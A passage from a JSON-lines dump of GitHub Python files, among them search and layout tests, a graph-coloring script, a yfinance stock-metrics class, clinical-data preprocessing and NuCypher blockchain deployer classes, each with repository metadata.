numpy.load(str(data.test))\n results, scores, _ = faiss_search(numpy.load(str(data.train)), queries, data.hits)\n auc1s_ann, tps_ann = evaluate_faiss(data, results)\n assert numpy.mean(auc1s_ann) == 0.871\n assert numpy.mean(tps_ann) == 0.91\n\n mmseqs.write_prefilter_db_data(\n data, numpy.arange(queries.shape[0]), results, scores\n )\n mmseqs.align(data)\n hits = mmseqs.read_result_db(data, data.mmseqs_dir.joinpath(\"result_combined\"))\n\n # noinspection PyTypeChecker\n auc1s_ann_alignment, tps_ann_alignment = evaluate(data, hits.items())\n assert numpy.mean(auc1s_ann_alignment) == 0.8925\n assert numpy.mean(tps_ann_alignment) == 0.91\n","repo_name":"konstin/knn-for-homology","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"22"} +{"seq_id":"2749809861","text":"persons = [\n {\n 'firstname': 'Roberto',\n 'lastname': 'Ruiz',\n 'age': 34,\n }\n]\n\npersons.append({\n 'firstname': 'Arelbis',\n 'lastname': 'Carpio',\n 'age': 29,\n})\n\nperson = {}\nperson['firstname'] = 'Ashley'\nperson['lastname'] = 'Ruiz'\nperson['age'] = 4\n\npersons.append(person)\n\nprint(persons)\n","repo_name":"rarc88/microsoft-python-basic","sub_path":"011_collections.py","file_name":"011_collections.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34661871752","text":"import os\nimport pathlib\nimport pytest\nfrom .utils import get_test_id, WORK_DIR\nimport importlib\nimport json\n\n\ndef check_shorts(pdk, cmdlist, constraints):\n spec = importlib.util.spec_from_file_location(\"Align_primitives\", pdk / 'Align_primitives.py')\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n main = getattr(module, \"main\")\n gen_parser = getattr(module, \"gen_parser\")\n parser = gen_parser()\n args = parser.parse_args(cmdlist)\n if constraints[0][\"parameters\"].get(\"height\", None) == 24:\n with pytest.raises(AssertionError):\n uc = main(args)\n return\n else:\n uc = main(args)\n assert len(uc.rd.shorts) == 0, uc.rd.shorts # rd = RemoveDuplicates\n assert len(uc.rd.opens) == 0, uc.rd.opens\n assert 
len(uc.rd.different_widths) == 0, uc.rd.different_widths\n assert len(uc.rd.subinsts) == 2 * args.Xcells * args.Ycells, uc.rd.subinsts\n common_centroid = set(['M1_X0_Y0', 'M2_X1_Y0', 'M2_X2_Y0', 'M1_X3_Y0', 'M2_X0_Y1',\n 'M1_X1_Y1', 'M1_X2_Y1', 'M2_X3_Y1'])\n if constraints[0][\"parameters\"].get(\"pattern\", None) == \"cc\":\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n elif constraints[0][\"parameters\"].get(\"pattern\", None) == \"ncc\":\n assert uc.rd.subinsts.keys() == set(['M1_X0_Y0', 'M1_X1_Y0', 'M2_X2_Y0', 'M2_X3_Y0', 'M1_X0_Y1',\n 'M1_X1_Y1', 'M2_X2_Y1', 'M2_X3_Y1']), f\"non common centroid should be AABB\"\n elif constraints[0][\"parameters\"].get(\"pattern\", None) == \"id\":\n assert uc.rd.subinsts.keys() == set(['M1_X0_Y0', 'M2_X1_Y0', 'M1_X2_Y0', 'M2_X3_Y0', 'M2_X0_Y1',\n 'M1_X1_Y1', 'M2_X2_Y1', 'M1_X3_Y1']), f\"inter digitated pattern should be ABAB\"\n elif constraints[0][\"parameters\"].get(\"shared_diff\", None) == True:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 3528], \"shared device should have smaller area\"\n elif constraints[0][\"parameters\"].get(\"shared_diff\", None) == False:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 2560, 3528]\n elif constraints[0][\"parameters\"].get(\"body\", None) == True:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 3528]\n elif constraints[0][\"parameters\"].get(\"body\", None) == False:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 2352]\n assert all(len(x.pins) == 3 for x in uc.rd.subinsts.values()), uc.rd.subinsts\n elif constraints[0][\"parameters\"].get(\"height\", None) == 36:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 4536]\n if constraints[0][\"parameters\"].get(\"body\", None) != False:\n assert all(len(x.pins) == 4 for x in uc.rd.subinsts.values()), uc.rd.subinsts\n assert len(uc.drc.errors) == 0, uc.drc.errors\n\n\ndef build_test(pdk, prim, *, n, X, Y, constraints):\n b = f\"{prim}_n{n}_X{X}_Y{Y}\"\n cwd = pathlib.Path(os.getcwd())\n with open(cwd / f'{prim}.const.json', 'w') as fp:\n fp.write(json.dumps(constraints, indent=2))\n check_shorts(pdk, ['-p', prim, '-b', b, '-n', f\"{n}\", '-X', f\"{X}\", '-Y', f\"{Y}\", '-c', f\"{cwd}\", '-o', f\"{cwd}\"], constraints)\n\n\nsupported_const = [{\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"cc\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"ncc\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"id\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"shared_diff\": True}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"shared_diff\": False}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"body\": True}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"body\": False}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"height\": 24}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"height\": 36}}\n 
]\n\n\n@pytest.mark.parametrize(\"const\", supported_const)\ndef test_mos_finfet_const(const):\n pdk = pathlib.Path(__file__).parent.parent.parent / 'pdks' / 'FinFET14nm_Mock_PDK'\n test_dir = WORK_DIR / \"mos_finfet\" / get_test_id()\n test_dir.mkdir(parents=True, exist_ok=True)\n os.chdir(test_dir)\n x = 2\n y = 2\n nfins = 12\n prim = 'DP_NMOS'\n build_test(pdk, prim, n=nfins, X=x, Y=y, constraints=[const])\n\n\n@pytest.mark.parametrize(\"const\", supported_const[0:3])\ndef test_mos_bulk_const(const):\n pdk = pathlib.Path(__file__).parent.parent.parent / 'pdks' / 'Bulk65nm_Mock_PDK'\n test_dir = WORK_DIR / \"mos_bulk\" / get_test_id()\n test_dir.mkdir(parents=True, exist_ok=True)\n os.chdir(test_dir)\n x = 2\n y = 2\n nfins = 12\n prim = 'DP_NMOS'\n build_test(pdk, prim, n=nfins, X=x, Y=y, constraints=[const])\n","repo_name":"ALIGN-analoglayout/ALIGN-public","sub_path":"tests/pdks/test_constrained_generator.py","file_name":"test_constrained_generator.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"22"} +{"seq_id":"11762514984","text":"from pathlib import Path\n\nimport numpy\n\nfrom seqvec_search import mmseqs\nfrom seqvec_search.data import LoadedData\nfrom seqvec_search.main import faiss_search, evaluate_faiss, evaluate\n\n\ndef test_search_ann():\n data = LoadedData.from_options(path=Path(\"test-data/small-random\"), hits=5)\n queries = numpy.load(str(data.test))\n results, scores, search_time = faiss_search(\n numpy.load(str(data.train)), queries, data.hits\n )\n auc1s, tps = evaluate_faiss(data, results)\n assert auc1s == [1.0, 1 / 3, 2 / 3, 0.0, 0.0, 1 / 3]\n assert tps == [1.0, 2 / 3, 2 / 3, 1.0, 1.0, 1.0]\n\n\ndef test_ann_alignment():\n data = LoadedData.from_options(path=Path(\"test-data/pfam-20-10\"), hits=10)\n queries = numpy.load(str(data.test))\n results, scores, _ = faiss_search(numpy.load(str(data.train)), queries, data.hits)\n auc1s_ann, tps_ann = evaluate_faiss(data, results)\n assert numpy.mean(auc1s_ann) == 0.871\n assert numpy.mean(tps_ann) == 0.91\n\n mmseqs.write_prefilter_db_data(\n data, numpy.arange(queries.shape[0]), results, scores\n )\n mmseqs.align(data)\n hits = mmseqs.read_result_db(data, data.mmseqs_dir.joinpath(\"result_combined\"))\n\n # noinspection PyTypeChecker\n auc1s_ann_alignment, tps_ann_alignment = evaluate(data, hits.items())\n assert numpy.mean(auc1s_ann_alignment) == 0.8925\n assert numpy.mean(tps_ann_alignment) == 0.91\n","repo_name":"konstin/knn-for-homology","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"22"} +{"seq_id":"2749809861","text":"persons = [\n {\n 'firstname': 'Roberto',\n 'lastname': 'Ruiz',\n 'age': 34,\n }\n]\n\npersons.append({\n 'firstname': 'Arelbis',\n 'lastname': 'Carpio',\n 'age': 29,\n})\n\nperson = {}\nperson['firstname'] = 'Ashley'\nperson['lastname'] = 'Ruiz'\nperson['age'] = 4\n\npersons.append(person)\n\nprint(persons)\n","repo_name":"rarc88/microsoft-python-basic","sub_path":"011_collections.py","file_name":"011_collections.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34661871752","text":"import networkx as nx\nfrom sympy import Symbol, symbols, Dummy, roots, solve\n\nfrom bokeh.plotting import figure, gridplot, GridSpec, output_file, show\n\ndef graph_draw(g, 
layout=nx.circular_layout, node_color="white", text_color="black"):\n    pos = layout(g)\n    labels = [ str(v) for v in g.nodes() ]\n    vx, vy = zip(*[ pos[v] for v in g.nodes() ])\n    xs, ys = [], []\n    for (a, b) in g.edges():\n        x0, y0 = pos[a]\n        x1, y1 = pos[b]\n        xs.append([x0, x1])\n        ys.append([y0, y1])\n    f = figure(plot_width=300, plot_height=300,\n               x_axis_type=None, y_axis_type=None,\n               outline_line_color=None,\n               tools=[], toolbar_location=None)\n    f.multi_line(xs, ys, line_color=\"black\")\n    f.circle(vx, vy, size=16, line_color=\"black\", fill_color=node_color)\n    f.text(vx, vy, text=labels, text_color=text_color,\n           text_font_size=\"10px\", text_align=\"center\", text_baseline=\"middle\")\n    return f\n\nV = range(1, 12+1)\nE = [(1,2),(2,3),(1,4),(1,6),(1,12),(2,5),(2,7),(3,8),(3,10),(4,11),(4,9),(5,6),\n     (6,7),(7,8),(8,9),(9,10),(10,11),(11,12),(5,12),(5,9),(6,10),(7,11),(8,12)]\n\ng = nx.Graph()\ng.add_nodes_from(V)\ng.add_edges_from(E)\n\n
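# Note added for clarity: the coloring is encoded algebraically. x**3 - 1 = 0\n# restricts each vertex variable to the three cube roots of unity, and since\n# x_i**3 - x_j**3 = (x_i - x_j)*(x_i**2 + x_i*x_j + x_j**2), the edge equation\n# x_i**2 + x_i*x_j + x_j**2 = 0 holds exactly when adjacent vertices take\n# different roots, i.e. different colors.\n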
Vx = [ Symbol('x%d' % i) for i in V ]\nEx = [ (Vx[i-1], Vx[j-1]) for i, j in E ]\nF3 = [ xi**3 - 1 for xi in Vx ]\nFg = [ xi**2 + xi*xj + xj**2 for xi, xj in Ex ]\nFx = F3 + Fg\n\ncolors = symbols('red,green,blue')\nroots_of_unity = roots(Dummy()**3 - 1, multiple=True)\ncolor_map = dict(zip(roots_of_unity, colors))\nsolutions = solve(Fx, *Vx)\ncolorings = [ [ color_map.get(zeta) for zeta in solution ] for solution in solutions ]\n\nn, ncols = len(colorings), 2\ngs = GridSpec((n + 1)//ncols, 1 + ncols)\ngs[0, 0] = graph_draw(g)\n\nfor i, coloring in enumerate(colorings):\n    f = graph_draw(g, node_color=[ str(color) for color in coloring ], text_color=\"white\")\n    gs[i//ncols, 1 + i%ncols] = f\nplot = gridplot(gs, toolbar_location=None)\n\noutput_file(\"graphs.html\", title=\"Graph k-coloring with computer algebra\")\nshow(plot)\n","repo_name":"marcottelab/protein_complex_maps","sub_path":"protein_complex_maps/plant_map_website/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"74038047416","text":"import yfinance as yf\r\n\r\nclass Stock:\r\n    def __init__(self, ticker):\r\n\r\n        num_dp = 3\r\n\r\n        # setting up the below metrics\r\n        self.obj = yf.Ticker(f'{ticker}')\r\n        self.info = self.obj.info\r\n\r\n        def metric(key, nd=None):\r\n            # Fetch a raw metric; returns None when Yahoo Finance has no value for the key\r\n            val = self.info.get(key)\r\n            if val is None:\r\n                return None\r\n            return round(float(val), nd) if nd is not None else float(val)\r\n\r\n        def ratio(num_key, den_key, nd=num_dp):\r\n            # Divide one metric by another; returns None when either side is missing\r\n            # or the denominator is zero, instead of raising mid-constructor\r\n            num, den = self.info.get(num_key), self.info.get(den_key)\r\n            if num is None or den is None or den == 0:\r\n                return None\r\n            return round(float(num) / float(den), nd)\r\n\r\n        # stock price metrics\r\n        self.ticker = ticker\r\n        self.price = metric('currentPrice')\r\n        self.marketCap = metric('marketCap')\r\n        self.numShares = metric('sharesOutstanding')\r\n        self.yearlyLowPrice = metric('fiftyTwoWeekLow')\r\n        self.yearlyHighPrice = metric('fiftyTwoWeekHigh')\r\n        self.fiftyDayMA = metric('fiftyDayAverage')\r\n        self.twoHundredDayMA = metric('twoHundredDayAverage')\r\n\r\n        # value metrics\r\n        self.acquirersMultiple = ratio('enterpriseValue', 'netIncomeToCommon')\r\n        self.currentRatio = metric('currentRatio', num_dp)\r\n        self.enterpriseValue = metric('enterpriseValue', num_dp)\r\n        self.eps = metric('trailingEps', num_dp)\r\n        self.evToEBITDA = metric('enterpriseToEbitda', num_dp)\r\n        self.evToOperatingCashFlow = ratio('enterpriseValue', 'operatingCashflow')\r\n        self.evToRev = metric('enterpriseToRevenue', num_dp)\r\n        self.peRatioTrail = metric('trailingPE', num_dp)\r\n        self.peRatioForward = metric('forwardPE', num_dp)\r\n        self.priceToSales = metric('priceToSalesTrailing12Months', num_dp)\r\n        self.priceToBook = metric('priceToBook', num_dp)\r\n
\r\n        # dividend metrics\r\n        self.dividendYield = metric('trailingAnnualDividendYield')\r\n        self.dividendRate = metric('dividendRate')\r\n        ex_div = self.info.get('exDividendDate')\r\n        self.exDivDate = str(ex_div) if ex_div is not None else None\r\n        self.lastDivVal = metric('lastDividendValue')\r\n        payout = self.info.get('payoutRatio')\r\n        self.payoutRatio = str(payout) if payout is not None else None\r\n\r\n        # balance sheet metrics\r\n        self.bookValue = metric('bookValue', num_dp)\r\n        self.bookValPerShare = ratio('bookValue', 'sharesOutstanding')\r\n        self.cash = metric('totalCash', num_dp)\r\n        self.cashPerShare = metric('totalCashPerShare', num_dp)\r\n        self.cashToMarketCap = ratio('totalCash', 'marketCap')\r\n        self.cashToDebt = ratio('totalCash', 'totalDebt')\r\n        self.debt = metric('totalDebt', num_dp)\r\n        self.debtToMarketCap = ratio('totalDebt', 'marketCap')\r\n        self.debtToEquityRatio = metric('debtToEquity', num_dp)\r\n        self.quickRatio = metric('quickRatio', num_dp)\r\n        self.returnOnAssets = metric('returnOnAssets', num_dp)\r\n        self.returnOnEquity = metric('returnOnEquity', num_dp)\r\n        self.totalAssets = metric('totalAssets', num_dp)\r\n\r\n        # income related\r\n        self.ebitda = metric('ebitda', num_dp)\r\n        self.ebitdaMargins = metric('ebitdaMargins', num_dp)\r\n        self.ebitdaPerShare = ratio('ebitda', 'sharesOutstanding')\r\n        self.earningsGrowth = metric('earningsGrowth', num_dp)\r\n        self.grossMargins = metric('grossMargins', num_dp)\r\n        self.grossProfit = metric('grossProfits', num_dp)\r\n        self.grossProfitPerShare = ratio('grossProfits', 'sharesOutstanding')\r\n        self.netIncome = metric('netIncomeToCommon', num_dp)\r\n        self.netIncomePerShare = ratio('netIncomeToCommon', 'sharesOutstanding')\r\n        self.operatingMargin = metric('operatingMargins', num_dp)\r\n        self.profitMargin = metric('profitMargins', num_dp)\r\n        self.revenue = metric('totalRevenue', num_dp)\r\n        self.revenueGrowth = metric('revenueGrowth', num_dp)\r\n        self.revenuePerShare = metric('revenuePerShare', num_dp)\r\n\r\n        # cash flow related\r\n        self.fcf = metric('freeCashflow', num_dp)\r\n        self.fcfToMarketCap = ratio('freeCashflow', 'marketCap')\r\n        self.fcfPerShare = ratio('freeCashflow', 'sharesOutstanding')\r\n        self.ocf = metric('operatingCashflow', num_dp)\r\n        self.ocfToRevenueRatio = ratio('operatingCashflow', 'totalRevenue')\r\n        self.ocfToMarketCap = ratio('operatingCashflow', 'marketCap')\r\n        self.ocfPerShare = ratio('operatingCashflow', 'sharesOutstanding')\r\n        self.fcfToEV = ratio('freeCashflow', 'enterpriseValue')\r\n        self.ocfToEV = ratio('operatingCashflow', 'enterpriseValue')\r\n
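\r\n    # Example usage (illustrative; 'MSFT' is just a sample ticker):\r\n    #   s = Stock('MSFT')\r\n    #   print(s.price, s.peRatioTrail, s.fcfToMarketCap)\r\n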
\r\n    def __repr__(self):\r\n        return f'Stock({self.ticker!r})'\r\n\r\n    def __str__(self):\r\n        return str(self.ticker)\r\n\r\n    def get_all_keys(self):\r\n        \"\"\"\r\n        prints all possible keys that are available to the developer\r\n        \"\"\"\r\n        for i in self.info.keys():\r\n            print(i)\r\n\r\n    def print_all_class_properties(self):\r\n        \"\"\"\r\n        prints all properties of this instance\r\n        \"\"\"\r\n        print(', '.join(\"%s: %s\" % item for item in vars(self).items()))\r\n\r\n\r\n","repo_name":"Alex-Jarosz-1996/yf_us","sub_path":"src/YahooFinanceScreenerClass.py","file_name":"YahooFinanceScreenerClass.py","file_ext":"py","file_size_in_byte":9812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5954379880","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom transformers import AutoTokenizer\nimport re\nfrom prcs import digit_place_embed\nfrom functools import partial\nimport tqdm\n\ndef pad_list(lst : list):\n    return np.pad(lst, (0, 150-len(lst)), 'constant', constant_values=(0))\n\ndef numpy_array(lst :list):\n    #Convert list to array\n    return np.array(lst).tolist()\n\ndef word2index(word_list, vocabs):\n    return vocabs[word_list]\n\ndef re_sub(x):\n    return re.sub(r'[,|!?\"\\':;~()\\[\\]]', '', x)\n\ndef null_fill(df, value_mode):\n    def _fillNA(seq, rp_value):\n        return [rp_value if x!=x else x for x in seq ]\n    \n    if value_mode =='VC':\n        df['value'] = df['value'].map(lambda x : _fillNA(x, 0.0))\n        df['uom'] = df['uom'].map(lambda x : _fillNA(x, ' ')) \n    else: \n        df['value'] = df['value'].map(lambda x : _fillNA(x, ' '))\n        df['uom'] = df['uom'].map(lambda x : _fillNA(x, ' '))\n    \n    return df\n\ndef agg_col(df, value_mode):\n    def _agg(a, b):\n        return [str(x) + str(y) for x,y in zip(a, b)]\n    \n    def _value_split(x):\n        # value seq list\n        seq = [' '.join(str(y)) for y in x ]\n        return seq \n    \n    def _round(seq):\n        return [round(x, 6) if type(x)==float else x for x in seq ]\n    \n    # NV => code_name \n    # VA => code_name + value + uom\n    # DSVA => code_name + value(split) + uom\n    # VC => code_name + uom / value\n    if value_mode == 'NV':\n        df['code_name'] = pd.Series([list(map(str, a)) for a in df['code_name']])\n\n    elif value_mode =='VA':\n        df['value'] = df['value'].map(lambda x : _round(x))\n        df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['value'])])\n        df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n    \n    elif value_mode =='DSVA':\n        df['value'] = df['value'].map(lambda x : _round(x))\n        df['value'] = df['value'].map(lambda x : _value_split(x))\n        df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['value'])])\n        df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n\n    elif value_mode =='VC':\n        df['value'] = df['value'].map(lambda x : _round(x))\n        df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n\n    return df\n\ndef making_vocab(df):\n    vocab_dict = {}\n    vocab_dict['[PAD]'] = 0\n    vocab_dict['[CLS]'] = 1\n    vocab_dict['[MASK]'] = 2\n\n    df['merge_code_set'] = df['code_name'].apply(lambda x : list(set(x)))\n    vocab_set = []\n    for codeset in df['merge_code_set']:\n        vocab_set.extend(codeset) \n    vocab_set = list(set(vocab_set))\n    for idx, vocab in enumerate(vocab_set):\n        vocab_dict[vocab] = idx+3\n    \n    return vocab_dict\n    \ndef _tokenized_max_length(vocab, tokenizer):\n    tokenized_vocab = 
tokenizer(list(vocab.keys()))\n max_word_len = max(list(map(len, tokenized_vocab['input_ids'])))\n return max_word_len\n\ndef _organize(seq):\n return re.sub(r'[,|!?\"\\':;~()\\[\\]]', '', seq)\n\ndef tokenize_seq(seq, word_max_len, tokenizer):\n seq = list(map(_organize, seq))\n seq = ['[PAD]' if x=='0.0' else x for x in seq]\n tokenized_seq= tokenizer(seq, padding = 'max_length', return_tensors='pt', max_length=word_max_len)\n return tokenized_seq\n\n\ndef convert2numpy(input_path, output_path):\n value_mode_list = ['NV', 'DSVA', 'VC']\n sources = ['mimic','eicu']\n tokenizer= AutoTokenizer.from_pretrained(\"emilyalsentzer/Bio_ClinicalBERT\")\n for src in sources:\n save_path = f'{output_path}/input/{src}'\n filename = '{}_df.pkl'.format(src)\n df = pd.read_pickle(os.path.join(input_path, filename))\n print('{} input files load !'.format(src))\n for value_mode in value_mode_list:\n print(value_mode)\n save_name = f'{src}_input_index_{value_mode}'\n print('save_name', save_name)\n df = null_fill(df, value_mode)\n df = agg_col(df, value_mode)\n\n vocab = making_vocab(df)\n vocab['0.0'] = 0\n src2index= partial(word2index, vocabs=vocab)\n # input_index \n index =[list(map(src2index, icu)) for icu in df['code_name']]\n array = np.array(index)\n np.save(os.path.join(save_path, save_name), array)\n \n print('tokenization start!')\n # tokenized\n word_max_len = _tokenized_max_length(vocab, tokenizer)\n token_tmp = [tokenize_seq(seq, word_max_len, tokenizer) for seq in tqdm.tqdm(df['code_name'])]\n df['input_ids'] =pd.Series([token['input_ids'] for token in token_tmp])\n df['token_type_ids'] =pd.Series([token['token_type_ids'] for token in token_tmp])\n df['attention_mask'] =pd.Series([token['attention_mask'] for token in token_tmp])\n \n #tokenized save\n np.save(os.path.join(save_path, f'input_ids_{value_mode}.npy'), np.array(df['input_ids'])) \n np.save(os.path.join(save_path, f'token_type_ids_{value_mode}.npy'), np.array(df['token_type_ids'])) \n np.save(os.path.join(save_path, f'attention_mask_{value_mode}.npy'), np.array(df['attention_mask'])) \n\n if value_mode == 'NV':\n #value\n value = np.array([df['value']])\n np.save(os.path.join(save_path, 'value.npy'), value[0])\n\n\n if value_mode =='DSVA':\n df = digit_place_embed(df, tokenizer)\n np.save(os.path.join(save_path, f'input_ids_DSVA_DPE.npy'), np.array(df['input_ids'])) \n np.save(os.path.join(save_path, f'token_type_ids_DSVA_DPE.npy'), np.array(df['token_type_ids'])) \n np.save(os.path.join(save_path, f'attention_mask_DSVA_DPE.npy'), np.array(df['attention_mask']))\n \n \n \n #seq_len\n seq_len = np.array([df['seq_len']])\n np.save(os.path.join(save_path, 'seq_len.npy'), seq_len[0]) \n\n ","repo_name":"hoon9405/DescEmb","sub_path":"preprocess/numpy_convert.py","file_name":"numpy_convert.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"22"} +{"seq_id":"24926347322","text":"\"\"\"\nThis file is part of nucypher.\n\nnucypher is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nnucypher is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\nGNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License\nalong with nucypher.  If not, see <https://www.gnu.org/licenses/>.\n\"\"\"\n\nimport json\nfrom collections import OrderedDict\nfrom json import JSONDecodeError\n\nimport maya\nfrom constant_sorrow import constants\nfrom constant_sorrow.constants import CONTRACT_NOT_DEPLOYED, NO_DEPLOYER_ADDRESS\nfrom datetime import datetime\nfrom twisted.internet import task, reactor\nfrom twisted.logger import Logger\nfrom typing import Tuple, List, Dict, Union\n\nfrom nucypher.blockchain.eth.agents import NucypherTokenAgent, MinerAgent, PolicyAgent\nfrom nucypher.blockchain.eth.chains import Blockchain\nfrom nucypher.blockchain.eth.deployers import NucypherTokenDeployer, MinerEscrowDeployer, PolicyManagerDeployer, \\\n    UserEscrowProxyDeployer, UserEscrowDeployer\nfrom nucypher.blockchain.eth.interfaces import BlockchainDeployerInterface\nfrom nucypher.blockchain.eth.registry import AllocationRegistry\nfrom nucypher.blockchain.eth.utils import (datetime_to_period,\n                                           validate_stake_amount,\n                                           validate_locktime,\n                                           calculate_period_duration)\nfrom nucypher.blockchain.eth.token import NU, Stake\n\n\ndef only_me(func):\n    def wrapped(actor=None, *args, **kwargs):\n        if not actor.is_me:\n            raise actor.MinerError(\"You are not {}\".format(actor.__class__.__name__))\n        return func(actor, *args, **kwargs)\n    return wrapped\n\n\nclass NucypherTokenActor:\n    \"\"\"\n    Concrete base class for any actor that will interface with NuCypher's ethereum smart contracts.\n    \"\"\"\n\n    class ActorError(Exception):\n        pass\n\n    def __init__(self,\n                 checksum_address: str = None,\n                 blockchain: Blockchain = None\n                 ) -> None:\n        \"\"\"\n        :param checksum_address: If not passed, we assume this is an unknown actor\n\n        :param token_agent: The token agent with the blockchain attached; if not passed, a default\n                            token agent and blockchain connection will be created from default values.\n\n        \"\"\"\n        try:\n            parent_address = self.checksum_public_address  # type: str\n            if checksum_address is not None:\n                if parent_address != checksum_address:\n                    raise ValueError(\"Can't have two different addresses.\")\n        except AttributeError:\n            self.checksum_public_address = checksum_address  # type: str\n\n        if blockchain is None:\n            blockchain = Blockchain.connect()\n        self.blockchain = blockchain\n\n        self.token_agent = NucypherTokenAgent()\n        self._transaction_cache = list()  # type: list  # track transactions transmitted\n\n    def __repr__(self):\n        class_name = self.__class__.__name__\n        r = \"{}(address='{}')\"\n        r = r.format(class_name, self.checksum_public_address)\n        return r\n\n    @property\n    def eth_balance(self):\n        \"\"\"Return this actor's current ETH balance\"\"\"\n        balance = self.token_agent.blockchain.interface.w3.eth.getBalance(self.checksum_public_address)\n        return self.blockchain.interface.w3.fromWei(balance, 'ether')\n\n    @property\n    def token_balance(self) -> NU:\n        \"\"\"Return this actor's current token balance\"\"\"\n        balance = int(self.token_agent.get_balance(address=self.checksum_public_address))\n        nu_balance = NU(balance, 'NuNit')\n        return nu_balance\n\n\nclass Deployer(NucypherTokenActor):\n\n    __interface_class = BlockchainDeployerInterface\n\n    def __init__(self,\n                 blockchain: Blockchain,\n                 deployer_address: str = None,\n                 bare: bool = True\n                 ) -> None:\n\n        self.blockchain = blockchain\n        self.__deployer_address = NO_DEPLOYER_ADDRESS\n        if deployer_address:\n            self.deployer_address = deployer_address\n\n        if not bare:\n            self.token_agent = 
NucypherTokenAgent(blockchain=blockchain)\n self.miner_agent = MinerAgent(blockchain=blockchain)\n self.policy_agent = PolicyAgent(blockchain=blockchain)\n\n self.user_escrow_deployers = dict()\n\n self.deployers = {\n NucypherTokenDeployer.contract_name: self.deploy_token_contract,\n MinerEscrowDeployer.contract_name: self.deploy_miner_contract,\n PolicyManagerDeployer.contract_name: self.deploy_policy_contract,\n UserEscrowProxyDeployer.contract_name: self.deploy_escrow_proxy,\n }\n\n def __repr__(self):\n r = '{name}({blockchain}, {deployer_address})'.format(name=self.__class__.__name__,\n blockchain=self.blockchain,\n deployer_address=self.deployer_address)\n return r\n\n @classmethod\n def from_blockchain(cls, provider_uri: str, registry=None, *args, **kwargs):\n blockchain = Blockchain.connect(provider_uri=provider_uri, registry=registry)\n instance = cls(blockchain=blockchain, *args, **kwargs)\n return instance\n\n @property\n def deployer_address(self):\n return self.blockchain.interface.deployer_address\n\n @deployer_address.setter\n def deployer_address(self, value):\n \"\"\"Used for validated post-init setting of deployer's address\"\"\"\n self.blockchain.interface.deployer_address = value\n\n @property\n def token_balance(self):\n if self.token_agent is CONTRACT_NOT_DEPLOYED:\n raise self.ActorError(\"Token contract not deployed\")\n return super().token_balance\n\n def deploy_token_contract(self):\n\n token_deployer = NucypherTokenDeployer(blockchain=self.blockchain, deployer_address=self.deployer_address)\n\n txhashes = token_deployer.deploy()\n self.token_agent = token_deployer.make_agent()\n return txhashes\n\n def deploy_miner_contract(self, secret: bytes):\n secret = self.blockchain.interface.w3.keccak(secret)\n miner_escrow_deployer = MinerEscrowDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = miner_escrow_deployer.deploy()\n self.miner_agent = miner_escrow_deployer.make_agent()\n return txhashes\n\n def deploy_policy_contract(self, secret: bytes):\n secret = self.blockchain.interface.w3.keccak(secret)\n policy_manager_deployer = PolicyManagerDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = policy_manager_deployer.deploy()\n self.policy_agent = policy_manager_deployer.make_agent()\n return txhashes\n\n def deploy_escrow_proxy(self, secret: bytes):\n secret = 